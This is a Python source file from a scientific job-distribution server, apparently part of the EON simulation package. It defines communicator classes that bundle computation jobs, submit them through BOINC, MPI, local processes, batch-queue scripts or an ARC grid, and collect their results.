from openstackeon.tasks import eon_work
# To ensure backward compatibility
import sys
# Backport of the builtin any() for Python < 2.5, where it does not exist.
if sys.version_info < (2, 5):
    def any(iterable):
        # Return True as soon as one element is truthy; False otherwise.
        for element in iterable:
            if element:
                return True
        return False
import re
def tryint(s):
    """Return int(s) if *s* parses as an integer, otherwise *s* unchanged.

    Used by alphanum_key() so numeric chunks sort numerically.
    """
    try:
        return int(s)
    except (TypeError, ValueError):
        # Only conversion failures fall back to the original value; the
        # previous bare `except:` also swallowed unrelated errors (e.g.
        # KeyboardInterrupt), which hid real problems.
        return s
def alphanum_key(s):
    """Split *s* into alternating text and integer chunks for natural sort.

    "z23a" -> ["z", 23, "a"]
    """
    # re.split with a capturing group keeps the digit runs; digit-only
    # chunks become ints (same effect as the tryint() helper), everything
    # else stays a string.
    return [int(chunk) if chunk.isdigit() else chunk
            for chunk in re.split('([0-9]+)', s)]
def sort_nicely(l):
    """ Sort the given list in the way that humans expect.

    In-place "natural sort": embedded digit runs compare numerically,
    so e.g. "state2" orders before "state10".
    """
    l.sort(key=alphanum_key)
def get_communicator():
    """Return the process-wide communicator selected by config.comm_type.

    Constructed once and memoized on the function object; raises
    ValueError for an unknown comm_type.
    """
    # This is an ugly hack to "remember" a communicator as it isn't possible to construct
    # the MPI communicator multiple times and it needs to remember its object level variables.
    if hasattr(get_communicator, 'comm'):
        return get_communicator.comm
    if config.comm_type=='boinc':
        comm = BOINC(config.path_scratch, config.comm_boinc_project_dir,
                config.comm_boinc_wu_template_path, config.comm_boinc_re_template_path,
                config.comm_boinc_appname, config.comm_boinc_results_path,
                config.comm_job_bundle_size, config.comm_boinc_priority)
    elif config.comm_type=='cluster':
        comm = Script(config.path_scratch, config.comm_job_bundle_size,
                config.comm_script_name_prefix,
                config.comm_script_path,
                config.comm_script_queued_jobs_cmd,
                config.comm_script_cancel_job_cmd,
                config.comm_script_submit_job_cmd)
    elif config.comm_type=='local':
        comm = Local(config.path_scratch, config.comm_local_client,
                config.comm_local_ncpus, config.comm_job_bundle_size)
    elif config.comm_type=='mpi':
        comm = MPI(config.path_scratch, config.comm_job_bundle_size)
    elif config.comm_type=='arc':
        comm = ARC(config.path_scratch, config.comm_job_bundle_size,
                config.comm_client_path, config.comm_blacklist,
                config.comm_num_submit)
    elif config.comm_type=='openstack':
        comm = OSP(config.path_scratch,config.comm_job_bundle_size,
                config.comm_openstack_rc_files,
                config.comm_openstack_n_workers,
                config.comm_openstack_master_index,
                config.comm_openstack_eon_server)
    else:
        logger.error(str(config.comm_type)+" is an unknown communicator.")
        raise ValueError()
    # Memoize for all subsequent calls.
    get_communicator.comm = comm
    return comm
class NotImplementedError(Exception):
    # NOTE(review): this shadows the builtin NotImplementedError inside
    # this module; kept as-is because existing raise/except sites rely on
    # this class.
    pass
class CommunicatorError(Exception):
    """Generic communicator failure (submission, database, configuration)."""
    pass
class EONClientError(Exception):
    """An EON client finished without outputting results, it probably crashed."""
    pass
class Communicator:
    """Base class for job communicators.

    Subclasses implement submit_jobs/get_results/get_queue_size/
    cancel_state; this base provides job bundling and unbundling between
    the scratch directory layout and per-task result dictionaries.
    """
    def __init__(self, scratchpath, bundle_size=1):
        # bundle_size tasks are packed into one job directory/workunit.
        if not os.path.isdir(scratchpath):
            # should probably log this event
            os.makedirs(scratchpath)
        self.scratchpath = scratchpath
        self.bundle_size = bundle_size
    def submit_jobs(self, data, invariants):
        '''Throws CommunicatorError if fails.'''
        raise NotImplementedError()
    def get_results(self, results):
        '''Returns a list of dictionaries containing the results.'''
        raise NotImplementedError()
    def get_queue_size(self):
        '''Returns the number of items waiting to run in the queue.'''
        raise NotImplementedError()
    def cancel_state(self, statenumber):
        '''Returns the number of workunits that were canceled.'''
        raise NotImplementedError()
    def get_bundle_size(self, job_path):
        # Returns (number of results*.dat files, whether they form a
        # multi-task bundle).  job_path may be a directory or a filename list.
        if not isinstance(job_path, list):
            # List files in job_path.
            fnames = os.listdir(job_path)
        else:
            # job_path is already a list of filenames.
            fnames = job_path
        # Count results*.dat files.
        pattern = re.compile(r'results(?:_\d+)?.dat$')
        size = sum(1
                   for fname in fnames
                   if pattern.match(fname))
        # A single plain "results.dat" means an unbundled (single-task) job.
        is_bundle = not (size == 1 and "results.dat" in fnames)
        return size, is_bundle
    def unbundle(self, resultpath, keep_result):
        '''This method unbundles multiple jobs into multiple single
        jobs so the akmc script can process them.
        If the job did not return results (probably because it
        crashed or was canceled), this method will raise
        EONClientError.
        '''
        # Generator: yields, per job directory, a list of per-task result
        # dicts mapping filename -> StringIO plus 'name' and 'number' keys.
        # These are the files in the result directory that we keep.
        jobpaths = [ os.path.join(resultpath,d) for d in os.listdir(resultpath)
                     if os.path.isdir(os.path.join(resultpath,d)) ]
        # Matches bundled filenames like "results_3.dat" -> (stem, index, ext).
        regex = re.compile(r"(\w+)_(\d+)(\.\w+)")
        for jobpath in jobpaths:
            basename, dirname = os.path.split(jobpath)
            if not keep_result(dirname):
                continue
            # Need to figure out how many jobs were bundled together
            # and then create the new job directories with the split files.
            bundle_size, is_bundle = self.get_bundle_size(jobpath)
            if bundle_size == 0:
                logger.error("Client running in %s returned no results. "
                             "Check its output for errors." % jobpath)
                # GH: just log the error and continue instead of quitting
                #raise EONClientError("Client running in %s returned no results. "
                #                     "Check its output for errors." % jobpath)
                continue
            results = [{'name': dirname} for i in xrange(bundle_size)]
            if not is_bundle:
                # Only a single task inside this job, no need to unbundle.
                for filename in glob.glob(os.path.join(jobpath, "*.*")):
                    if not (filename.endswith(".con") or
                            filename.endswith(".dat")):
                        continue
                    rootname, fname = os.path.split(filename)
                    f = open(filename,'r')
                    filedata = StringIO(f.read())
                    f.close()
                    # add result to results
                    results[0][fname] = filedata
                    results[0]['number'] = 0
            else:
                # Several tasks bundled inside this job, we need to unbundle.
                filenames = glob.glob(os.path.join(jobpath,"*_[0-9]*.*"))
                for filename in filenames:
                    if not (filename.endswith(".con") or
                            filename.endswith(".dat")):
                        continue
                    # parse filename
                    rootname, fname = os.path.split(filename)
                    match = regex.match(fname)
                    if not match:
                        continue
                    parts = match.groups()
                    index = int(parts[1])
                    key = parts[0]+parts[2]
                    # Load data into stringIO object (should we just return filehandles?)
                    try:
                        f = open(filename,'r')
                        filedata = StringIO(f.read())
                        f.close()
                    except (IOError, OSError):
                        logger.exception("Failed to read file %s" % filename)
                        continue
                    # add result to results
                    results[index][key] = filedata
                    results[index]['number'] = index
            # XXX: UGLY: We need a way to check if there are no results.
            if not any([ filename.startswith('results') for filename in results[0].keys() ]):
                logger.warning("Failed to find a result.dat file for %s",results[0]['name'])
                results = []
            yield results
    def make_bundles(self, data, invariants):
        '''This method is a generator that bundles together multiple jobs into a single job.
        Example usage:
            for jobpath in self.make_bundles(data, invariants):
                do_stuff()'''
        # invariants maps filename -> (StringIO contents, permission bits)
        # and is written into every bundle; per-task files get an _N suffix.
        # Split jobpaths in to lists of size self.bundle_size.
        chunks = [ data[i:i+self.bundle_size] for i in range(0, len(data), self.bundle_size) ]
        for chunk in chunks:
            # create the bundle's directory
            job_path = os.path.join(self.scratchpath, chunk[0]['id'])
            os.mkdir(job_path)
            for filename in invariants.keys():
                f = open(os.path.join(job_path, filename), 'w')
                file_contents, file_permissions = invariants[filename]
                # f.write(invariants[filename].getvalue())
                f.write(file_contents.getvalue())
                f.close()
                os.chmod(os.path.join(job_path, filename), file_permissions)
            # Concatenate all of the displacement and modes together.
            n = 0
            for job in chunk:
                for basename in job.keys():
                    splitname = basename.rsplit(".", 1)
                    if len(splitname)!=2:
                        continue
                    if self.bundle_size == 1:
                        filename = basename
                    else:
                        filename = "%s_%d.%s" % (splitname[0], n, splitname[1])
                    f = open(os.path.join(job_path, filename), 'w')
                    f.write(job[basename].getvalue())
                    f.close()
                n += 1
            # Returns the jobpath to the new bigger workunit.
            yield job_path
class BOINC(Communicator):
    """Communicator that submits/collects jobs through a BOINC project.

    Talks directly to the project's MySQL database (via the BOINC Python
    modules) and to its file hierarchy; workunits belonging to this run
    are tagged with a per-run "batch" id stored in scratch/uniqueid.
    """
    def __init__(self, scratchpath, boinc_project_dir, wu_template, result_template,
                 appname, boinc_results_path, bundle_size, priority):
        '''
        This constructor modifies sys.path to include the BOINC python
        modules. It then tries to connect to the BOINC mysql database raising
        exceptions if there are problems connecting. It also creates a file
        named uniqueid in the scratchpath to identify BOINC jobs as belonging
        to this akmc run if it doesn't exist. It then reads in the uniqueid
        file and stores that as an integer in self.uniqueid.
        '''
        Communicator.__init__(self, scratchpath, bundle_size)
        self.wu_template = wu_template
        self.result_template = result_template
        self.appname = appname
        self.boinc_project_dir = boinc_project_dir
        self.boinc_results_path = boinc_results_path
        self.priority = priority
        # The BOINC python modules read this environment variable.
        os.environ['BOINC_PROJECT_DIR'] = self.boinc_project_dir
        import sys
        sys.path.insert(0, os.path.join(self.boinc_project_dir, 'py'))
        try:
            import Boinc.database
            import Boinc.db_base
            import Boinc.boinc_db
        except ImportError:
            raise CommunicatorError("The Boinc python module could not be imported.\n"
                                    "Perhaps the boinc project path is set incorrectly?")
        self.database = Boinc.database
        self.boinc_db_constants = Boinc.boinc_db
        self.db_base = Boinc.db_base
        try:
            self.database.connect_default_config()
        except:
            # XXX: This error handling is maybe a little ugly, but provides all the information
            # that you would want to know. The exception that connect_default_config() throws
            # is not helpful. It often will just say that it couldn't parse a xml file when it
            # really means it can't find the project's config.xml file.
            import traceback
            # print the traceback from connect_default_config
            traceback.print_exc()
            # raise a nice human readable error
            raise CommunicatorError("Couldn't connect to the BOINC database.")
        self.dbconnection = self.db_base.dbconnection
        self.cursor = self.dbconnection.cursor()
        # generate our unique id if it doesn't already exist.
        uniqueid_path = os.path.join(self.scratchpath, "uniqueid")
        if not os.path.isfile(uniqueid_path):
            f = open(uniqueid_path, 'w')
            import random
            uid = random.randint(0, 2147483647)
            f.write("%s\n" % uid)
            f.close()
            logger.debug("Wrote new unique id %i to %s" % (uid, uniqueid_path))
        try:
            f = open(uniqueid_path)
        except IOError:
            raise CommunicatorError("Unable to open the uniqueid file: %s" % uniqueid_path)
        try:
            self.uniqueid = int(f.read().strip())
            logger.debug("Read in unique id %i from %s" % (self.uniqueid,
                uniqueid_path))
        except ValueError:
            raise CommunicatorError("Trouble converting uniqueid value in %s to integer" % uniqueid_path)
        # Used as the -rsc_fpops_est hint for newly created workunits.
        self.average_flops = self.get_average_flops()
        logger.debug("Current average flops per wu is %.2e", self.average_flops)
    def get_average_flops(self):
        'This function might be slow with large result tables and without '
        'mysql indices on result.cpu_time, result.workunits, result.hostid, '
        'and workunit.batch.'
        # number of wus to average over
        limit = 500
        query = "select r.cpu_time*h.p_fpops " \
                "from workunit w, result r, host h "\
                "where r.workunitid=w.id and r.hostid=h.id and w.batch=%i "\
                "and cpu_time>0 limit %i" % (self.uniqueid, limit)
        self.cursor.execute(query)
        rows = self.cursor.fetchall()
        if rows:
            average_flops = 0.0
            counter = 0
            for row in rows:
                average_flops += row.values()[0]
                counter += 1
            average_flops /= counter
        else:
            # 2e11 flops is about a 100 second job (assuming 2 gigaflop cpu)
            average_flops = 2e11
        return average_flops
    def get_queue_size(self):
        # Count results of this batch still waiting to be sent to clients.
        server_state = self.boinc_db_constants.RESULT_SERVER_STATE_UNSENT
        query = 'select count(*) from result where batch=%i and server_state=%i'
        query = query % (self.uniqueid, server_state)
        self.cursor.execute(query)
        row = self.cursor.fetchone()
        number_unsent = row['count(*)']
        return number_unsent
    def get_number_in_progress(self):
        # Count results of this batch currently checked out by clients.
        server_state = self.boinc_db_constants.RESULT_SERVER_STATE_IN_PROGRESS
        query = 'select count(*) from result where batch=%i and server_state=%i'
        query = query % (self.uniqueid, server_state)
        self.cursor.execute(query)
        row = self.cursor.fetchone()
        number_in_progress = row['count(*)']
        return number_in_progress
    def cancel_state(self, statenumber):
        # Cancel all unsent workunits whose name encodes the given state
        # number; returns the number of workunits cancelled.
        # XXX: This function might be too expensive. Probably needs to be
        # profiled later. It has to get all of the result rows that correspond
        # to a unique id find which state they correspond to by parsing the
        # wu name and then update the rows that correspond to statenumber.
        state_unsent = self.boinc_db_constants.RESULT_SERVER_STATE_UNSENT
        q1 = "select id,workunitid,name from result where batch=%i and server_state=%i"
        q1 = q1 % (self.uniqueid, state_unsent)
        self.cursor.execute(q1)
        if self.cursor.rowcount == 0:
            return 0
        result_ids = []
        workunit_ids = []
        while 1:
            row = self.cursor.fetchone()
            if row is None:
                break
            result_id = row['id']
            workunit_id = row['workunitid']
            name = row['name']
            # wu name format is "<batch>_<state>_..."; field 1 is the state.
            result_statenumber = name.split('_')[1]
            if statenumber == int(result_statenumber):
                result_ids.append(str(result_id))
                workunit_ids.append(str(workunit_id))
        resultid_string = '('+','.join(result_ids) + ')'
        state_over = self.boinc_db_constants.RESULT_SERVER_STATE_OVER
        outcome_not_needed = self.boinc_db_constants.RESULT_OUTCOME_DIDNT_NEED
        error_mask_cancelled = self.boinc_db_constants.WU_ERROR_CANCELLED
        q1 = "update result set server_state=%i, outcome=%i where id in %s"
        q1 = q1 % (state_over, outcome_not_needed, resultid_string)
        self.cursor.execute(q1)
        workunitid_string = '('+','.join(workunit_ids) + ')'
        q2 = "update workunit set error_mask=%i, transition_time=%i where id in %s"
        q2 = q2 % (error_mask_cancelled, int(time()), workunitid_string)
        self.cursor.execute(q2)
        num_cancelled_wu = self.cursor.rowcount
        self.db_base.dbconnection.commit()
        return num_cancelled_wu
    def dir_hier_path(self, filename):
        # Ask the BOINC helper where `filename` lives in the download
        # directory hierarchy.
        cmd = os.path.join(self.boinc_project_dir,"bin","dir_hier_path")
        path = commands.getoutput("%s %s" % (cmd, filename))
        return path
    def submit_jobs(self, jobdata, invariants):
        # Pack each bundle of jobs into a .tgz in the BOINC download
        # hierarchy and register it as a workunit.
        now = time()
        chunks = [ jobdata[i:i+self.bundle_size] for i in
                   range(0, len(jobdata), self.bundle_size) ]
        for jobs in chunks:
            # Workunit names encode the batch id and the first job's id.
            wu_name = "%i_%s" % (self.uniqueid, jobs[0]['id'])
            tarname = "%s.tgz" % wu_name
            tarpath = self.dir_hier_path(tarname)
            tar = tarfile.open(tarpath, "w:gz")
            jobfiles = {}
            n=0
            for job in jobs:
                job.pop('id')
                for origname,data in job.iteritems():
                    # Per-task files get an _<index> suffix inside the bundle.
                    splitname = origname.rsplit(".",1)
                    newname = "%s_%d.%s" % (splitname[0], n, splitname[1])
                    jobfiles[newname] = data
                n += 1
            # Add the files in job and in invariants to the tar file
            for filelist in (jobfiles, invariants):
                for filename, filehandle in filelist.iteritems():
                    info = tarfile.TarInfo(name=filename)
                    info.size = len(filehandle.getvalue())
                    info.mtime = now
                    filehandle.seek(0)
                    tar.addfile(info, filehandle);
            tar.close()
            self.create_work(tarpath, wu_name)
    def create_work(self, tarpath, wu_name):
        # Invoke the project's bin/create_work to register the workunit.
        create_wu_cmd = os.path.join('bin', 'create_work')
        # XXX: make sure permissions are correct
        # this should be a config option for the boinc group
        mode = 0666
        os.chmod(tarpath, mode)
        arglist = [create_wu_cmd]
        arglist.append("-appname")
        arglist.append(self.appname)
        arglist.append("-wu_name")
        arglist.append(wu_name)
        arglist.append("-wu_template")
        arglist.append(self.wu_template)
        arglist.append("-result_template")
        arglist.append(self.result_template)
        arglist.append("-batch")
        arglist.append(str(self.uniqueid))
        arglist.append("-priority")
        arglist.append(str(self.priority))
        arglist.append("-rsc_fpops_est")
        arglist.append(str(self.average_flops))
        # last arguments are the filenames
        arglist.append("%s.tgz" % wu_name)
        p = subprocess.Popen(arglist, cwd=self.boinc_project_dir,
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        retval = p.wait()
        if retval != 0:
            stdout, stderr = p.communicate()
            errstr = "Problem submitting the BOINC workunit:\nstdout: %s\nstderr %s" % \
                     (stdout, stderr)
            raise CommunicatorError(errstr)
    def get_results(self, resultspath, keep_result):
        # Generator: scan the assimilated-results directory for tarballs of
        # this batch and yield one result dict per bundled task.
        all_results = os.listdir(self.boinc_results_path)
        all_results = [ f for f in all_results if '_' in f ]
        my_results = [ f for f in all_results
                       if f.split('_')[0] == str(self.uniqueid) and
                       'no_output_files' not in f]
        for resultfile in my_results:
            # jobname looks like state#_job#
            # jobname is everything but the first underscore records
            jobname = '_'.join(resultfile.split('_')[1:])
            resultpath = os.path.join(self.boinc_results_path, resultfile)
            if not keep_result(jobname):
                os.remove(resultpath)
                continue
            try:
                tar = tarfile.open(resultpath)
                bundle_size, _ = self.get_bundle_size(tar.getnames())
                results = [ {'name':jobname} for i in range(bundle_size) ]
                if config.debug_keep_all_results:
                    rp = os.path.join(config.path_root,config.debug_results_path)
                    if not os.path.isdir(rp):
                        os.mkdir(rp)
                    os.mkdir(os.path.join(rp,jobname))
                for tarinfo in tar:
                    try:
                        index = int(tarinfo.name.split('_')[-1].split('.')[0])
                    except:
                        logger.exception("Failed to process file %s in tar" % tarinfo.name)
                        continue
                    # Strip the _<index> suffix to recover the original name.
                    splitname = tarinfo.name.rsplit(".",1)
                    newfilename = "%s.%s" % (splitname[0].rsplit("_",1)[0],splitname[1])
                    # Read the file in the tar archive into a stringio; you cannot return the filehandle
                    # that extractfile returns as it will be closed when tar.close() is called.
                    fh = StringIO(tar.extractfile(tarinfo).read())
                    if config.debug_keep_all_results:
                        f = open(os.path.join(config.path_root, config.debug_results_path, jobname, tarinfo.name),'w')
                        f.write(fh.getvalue())
                        f.close()
                        fh.seek(0)
                    results[index][newfilename] = fh
                    results[index]["number"] = index
                tar.close()
                # os.remove(resultpath)
            except:
                logger.exception(
                    "Something tar-file related went wrong with file %s" % resultpath)
                try:
                    os.remove(resultpath)
                except:
                    logger.exception("Failed to remove %s" % resultpath)
                continue
            for result in results:
                yield result
class MPI(Communicator):
    '''Communicator that hands bundled jobs to eon client processes running
    as MPI ranks.  Clients announce readiness with a tag-1 message and
    report finished job paths with a tag-0 message.'''
    def __init__(self, scratchpath, bundle_size):
        Communicator.__init__(self, scratchpath, bundle_size)
        from mpi4py.MPI import COMM_WORLD
        self.comm = COMM_WORLD
        # Colon-separated list of ranks that run eon clients,
        # e.g. EON_CLIENT_RANKS="1:2:3".
        self.client_ranks = [ int(r) for r in os.environ['EON_CLIENT_RANKS'].split(":") ]
        config.comm_job_buffer_size = len(self.client_ranks)
        # Job directories left in scratch by a previous run; they are
        # re-dispatched by run_resume_jobs().
        self.resume_jobs = []
        if os.path.isdir(self.scratchpath):
            self.resume_jobs = [ d for d in os.listdir(self.scratchpath) if os.path.isdir(os.path.join(self.scratchpath,d)) ]
            logger.info("Found %i jobs to resume in %s", len(self.resume_jobs), self.scratchpath)
    def submit_jobs(self, data, invariants):
        # NOTE(review): assumes a ready rank exists for every bundle;
        # ready_ranks.pop() would raise IndexError otherwise -- presumably
        # comm_job_buffer_size guarantees this, confirm with caller.
        ready_ranks = self.get_ready_ranks()
        for jobpath in self.make_bundles(data, invariants):
            rank = ready_ranks.pop()
            tmp = numpy.empty(1, dtype='i')
            # Consume the client's "ready" message (tag 1)...
            self.comm.Recv(tmp, source=rank, tag=1)
            # ...then send the NUL-terminated path of the job to run.
            buf = array('c', jobpath+'\0')
            self.comm.Send(buf, rank)
    def run_resume_jobs(self):
        '''Dispatch leftover scratch jobs to any currently-ready ranks.'''
        if len(self.resume_jobs) == 0: return
        ready_ranks = self.get_ready_ranks()
        while True:
            if len(self.resume_jobs) == 0: break
            if len(ready_ranks) == 0: break
            jobdir = self.resume_jobs.pop()
            rank = ready_ranks.pop()
            jobpath = os.path.join(self.scratchpath,jobdir)
            tmp = numpy.empty(1, dtype='i')
            self.comm.Recv(tmp, source=rank, tag=1)
            buf = array('c', jobpath+'\0')
            self.comm.Send(buf, rank)
    def get_ready_ranks(self):
        '''Return the client ranks that have posted a tag-1 "ready" message.'''
        ready_ranks = []
        for rank in self.client_ranks:
            # Non-blocking probe: does not consume the message.
            ready = self.comm.Iprobe(rank, tag=1)
            if ready:
                logger.info("Rank %i is ready" % rank)
                ready_ranks.append(rank)
        return ready_ranks
    def get_queue_size(self):
        # Clients without a pending "ready" message are assumed busy.
        self.run_resume_jobs()
        nready = len(self.get_ready_ranks())
        nclients = len(self.client_ranks)
        qs = nclients - nready
        return qs
    def get_results(self, resultspath, keep_result):
        '''Moves work from scratchpath to results path.'''
        from mpi4py.MPI import ANY_SOURCE, Status
        status = Status()
        # Each tag-0 message carries the NUL-terminated path of a finished
        # job directory in scratch.
        while self.comm.Iprobe(ANY_SOURCE, tag=0, status=status):
            buf = array('c', '\0'*1024)
            self.comm.Recv(buf, source=status.source, tag=0)
            jobdir = buf[:buf.index('\0')].tostring()
            jobdir = os.path.split(jobdir)[1]
            if config.debug_keep_all_results:
                shutil.copytree(os.path.join(self.scratchpath,jobdir),
                        os.path.join(config.path_root, config.debug_results_path, jobdir))
            dest_dir = os.path.join(resultspath, jobdir)
            shutil.move(os.path.join(self.scratchpath,jobdir), dest_dir)
        for bundle in self.unbundle(resultspath, keep_result):
            for result in bundle:
                yield result
    def get_number_in_progress(self):
        return int(os.environ['EON_NUMBER_OF_CLIENTS'])
    def cancel_state(self, state):
        #XXX: how to support this...
        return 0
class Local(Communicator):
    '''Communicator that runs up to ncpus eon client subprocesses on the
    local machine.'''
    def __init__(self, scratchpath, client, ncpus, bundle_size):
        Communicator.__init__(self, scratchpath, bundle_size)
        # number of cpus to use
        self.ncpus = ncpus
        # path to the client
        if '/' in client:
            # An explicit path was given; it must exist.
            self.client = os.path.abspath(client)
            if not os.path.isfile(self.client):
                logger.error("Can't find client: %s", client)
                raise CommunicatorError("Can't find client binary: %s"%client)
        else:
            # is the client in the local directory?
            if os.path.isfile(client):
                self.client = os.path.abspath(client)
            # is the client in the path?
            elif sum([ os.path.isfile(os.path.join(d, client)) for d in
                       os.environ['PATH'].split(':') ]) != 0:
                self.client = client
            else:
                logger.error("Can't find client: %s", client)
                raise CommunicatorError("Can't find client binary: %s"%client)
        # List of (Popen, jobpath) tuples for running clients.
        self.joblist = []
        import atexit
        # don't let clients hang around if the script dies
        atexit.register(self.cleanup)
    def cleanup(self):
        '''Kills the running eonclients.'''
        import signal
        for job in self.joblist:
            p = job[0]
            try:
                os.kill(p.pid, signal.SIGKILL)
            except OSError:
                # Process already exited; nothing to kill.
                pass
    def get_results(self, resultspath, keep_result):
        '''Moves work from scratchpath to results path.'''
        jobdirs = [ d for d in os.listdir(self.scratchpath)
                    if os.path.isdir(os.path.join(self.scratchpath,d)) ]
        for jobdir in jobdirs:
            if config.debug_keep_all_results:
                shutil.copytree(os.path.join(self.scratchpath,jobdir), os.path.join(config.path_root, config.debug_results_path,jobdir))
            dest_dir = os.path.join(resultspath, jobdir)
            shutil.move(os.path.join(self.scratchpath,jobdir), dest_dir)
        for bundle in self.unbundle(resultspath, keep_result):
            for result in bundle:
                yield result
        # Clean out scratch directory
        for name in os.listdir(self.scratchpath):
            path_name = os.path.join(self.scratchpath, name)
            if not os.path.isdir(path_name):
                continue
            shutil.rmtree(path_name)
    def check_job(self, job):
        '''Log the outcome of a finished client process.
        Returns True on success (exit code 0); logs a warning otherwise.'''
        p, jobpath = job
        if p.returncode == 0:
            logger.info('Job finished: %s' % jobpath)
            return True
        else:
            stdout, stderr = p.communicate()
            errmsg = "job failed: %s: %s" % (jobpath, stderr)
            logger.warning(errmsg)
    def submit_jobs(self, data, invariants):
        '''Run up to ncpu number of clients to process the work in jobpaths.
        The job directories are moved to the scratch path before the calculation
        is run. This method doesn't return anything.'''
        for jobpath in self.make_bundles(data, invariants):
            # move the job directory to the scratch directory
            # update jobpath to be in the scratch directory
            fstdout = open(os.path.join(jobpath, "stdout.dat"),'w')
            p = subprocess.Popen(self.client,cwd=jobpath,
                    stdout=fstdout, stderr=subprocess.PIPE)
            #commands.getoutput("renice -n 20 -p %d" % p.pid)
            self.joblist.append((p,jobpath))
            # Throttle: poll until a slot frees up before launching more.
            while len(self.joblist) == self.ncpus:
                for i in range(len(self.joblist)):
                    p = self.joblist[i][0]
                    retval = p.poll()
                    if retval is None:
                        continue
                    else:
                        self.check_job(self.joblist[i])
                        self.joblist.pop(i)
                        break
                sleep(0.1)
        # wait for everything to finish
        for job in self.joblist:
            p = job[0]
            p.wait()
            self.check_job(job)
    def cancel_state(self, state):
        return 0
    def get_queue_size(self):
        return 0
    def get_number_in_progress(self):
        return 0
class Script(Communicator):
    '''Communicator that talks to a batch queue (e.g. PBS/SGE) through three
    user-supplied scripts: one to submit a job, one to cancel a job, and one
    to list queued job ids.

    A mapping from queue job ids to eon job ids is pickled to
    scratch_path/script_job_ids so that in-flight jobs survive server
    restarts.'''
    def __init__(self, scratch_path, bundle_size, name_prefix, scripts_path,
                 queued_jobs_cmd, cancel_job_cmd, submit_job_cmd):
        Communicator.__init__(self, scratch_path, bundle_size)

        # Full paths to the user-provided queue-interaction scripts.
        self.queued_jobs_cmd = os.path.join(scripts_path, queued_jobs_cmd)
        self.cancel_job_cmd = os.path.join(scripts_path, cancel_job_cmd)
        self.submit_job_cmd = os.path.join(scripts_path, submit_job_cmd)

        self.job_id_path = os.path.join(scratch_path, "script_job_ids")
        self.name_prefix = name_prefix

        # Restore the queue-id -> eon-id mapping from a previous run;
        # start empty if the file does not exist yet.
        try:
            f = open(self.job_id_path, "r")
            self.jobids = pickle.load(f)
            f.close()
        except IOError:
            self.jobids = {}

    def save_jobids(self):
        '''Persist the queue-id -> eon-id mapping to disk.'''
        f = open(self.job_id_path, "w")
        pickle.dump(self.jobids, f)
        f.close()

    def get_results(self, resultspath, keep_result):
        '''Moves work from scratchpath to results path.'''
        # Finished jobs are the ones we know about that are no longer in
        # the queue.  BUGFIX: the queue-status script used to be invoked
        # twice here (the first result was assigned to an unused variable);
        # call it once and reuse the result.
        queued_jobids = self.get_queued_jobs()
        finished_jobids = set(self.jobids.keys()) - set(queued_jobids)

        finished_eonids = []
        for jobid in finished_jobids:
            finished_eonids.append(int(self.jobids.pop(jobid)))

        # Job directories are named "<prefix>_<eonid>".
        jobdirs = [ d for d in os.listdir(self.scratchpath)
                    if os.path.isdir(os.path.join(self.scratchpath,d))
                    if int(d.rsplit('_', 1)[-1]) in finished_eonids ]

        #try to return jobs in order
        sort_nicely(jobdirs)
        for jobdir in jobdirs:
            if config.debug_keep_all_results:
                shutil.copytree(os.path.join(self.scratchpath,jobdir), os.path.join(config.path_root, config.debug_results_path,jobdir))
            dest_dir = os.path.join(resultspath, jobdir)
            shutil.move(os.path.join(self.scratchpath,jobdir), dest_dir)
        for bundle in self.unbundle(resultspath, keep_result):
            for result in bundle:
                yield result

    def check_command(self, status, output, cmdname):
        '''Log output and raise CommunicatorError if a script exited with a
        non-zero status.'''
        if status != 0:
            logger.error(output)
            raise CommunicatorError("'%s' returned a non-zero exit status"%cmdname)

    def submit_jobs(self, data, invariants):
        '''Bundle the given jobs and hand each bundle to the submit script.
        The submit script must print the queue's numeric job id on stdout.'''
        for jobpath in self.make_bundles(data, invariants):
            # submit_job.sh jobname jobpath
            # should return a jobid
            # need to associate this jobid with our jobid
            jobpath = os.path.realpath(jobpath)
            jobname = "%s_%s" % (self.name_prefix, os.path.basename(jobpath))
            eon_jobid = jobname.rsplit('_',1)[-1]
            cmd = "%s %s %s" % (self.submit_job_cmd, jobname, jobpath)
            status, output = commands.getstatusoutput(cmd)
            self.check_command(status, output, cmd)
            jobid = int(output.strip())
            self.jobids[jobid] = eon_jobid
            # XXX: It is probably slow to save after EVERY job submission,
            # but is slow better than losing jobs?
            self.save_jobids()

    def cancel_state(self, state):
        '''Cancel every outstanding queue job and wipe the scratch
        directory.  Returns the number of jobs that were cancelled.'''
        # cancel_job.sh jobid
        # BUGFIX: capture the count before clearing self.jobids; the old
        # code returned len(self.jobids) AFTER clearing it, always 0.
        ncancelled = len(self.jobids)
        if ncancelled == 0:
            return 0
        for job_id in self.jobids.keys():
            cmd = "%s %i" % (self.cancel_job_cmd, job_id)
            status, output = commands.getstatusoutput(cmd)
            if status != 0:
                logger.warn("Job cancel failed with error: %s" % output)
        self.jobids = {}
        self.save_jobids()
        shutil.rmtree(config.path_scratch)
        os.makedirs(config.path_scratch)
        return ncancelled

    def get_queued_jobs(self):
        '''Return the subset of our job ids still in the queue, as reported
        by the queue-status script (one numeric id per line; non-numeric
        lines are ignored).'''
        status, output = commands.getstatusoutput(self.queued_jobs_cmd)
        self.check_command(status, output, self.queued_jobs_cmd)
        queued_job_ids = []
        for line in output.split("\n"):
            try:
                queued_job_ids.append(int(line))
            except ValueError:
                continue
        return list(set(self.jobids).intersection(queued_job_ids))

    def get_number_in_progress(self):
        return 0

    def get_queue_size(self):
        return len(self.get_queued_jobs())
class ARC(Communicator):
    '''Communicator that submits jobs to an ARC (Advanced Resource
    Connector) grid via the arclib Python bindings.  State about active
    jobs and the local submission queue is persisted in the scratch
    directory across runs.'''
    def __init__(self, scratchpath, bundle_size, client_path, blacklist, num_submit):
        # Flag read by __del__: only persist state if __init__ finished,
        # otherwise we might overwrite job records we never loaded.
        self.init_completed = False
        Communicator.__init__(self, scratchpath, bundle_size)
        try:
            import arclib
            self.arclib = arclib
        except ImportError:
            raise CommunicatorError("ARCLib can't be imported. Check if PYTHONPATH is set correctly")
        self.arclib.SetNotifyLevel(self.arclib.WARNING)
        self.client_path = client_path
        # Number of jobs to submit to each target cluster per call.
        self.num_submit = num_submit
        # Hostnames of clusters we must never submit to.
        self.blacklist = blacklist
        # Lazily-fetched ARC queue information (see get_targets()).
        self.queue_info = None
        # Check grid certificate proxy
        try:
            c = self.arclib.Certificate(self.arclib.PROXY)
        except self.arclib.CertificateError, msg:
            raise CommunicatorError(str(msg) + ".\n\nForgot to run grid-proxy-init?\n")
        if c.IsExpired():
            raise CommunicatorError("Grid proxy has expired!")
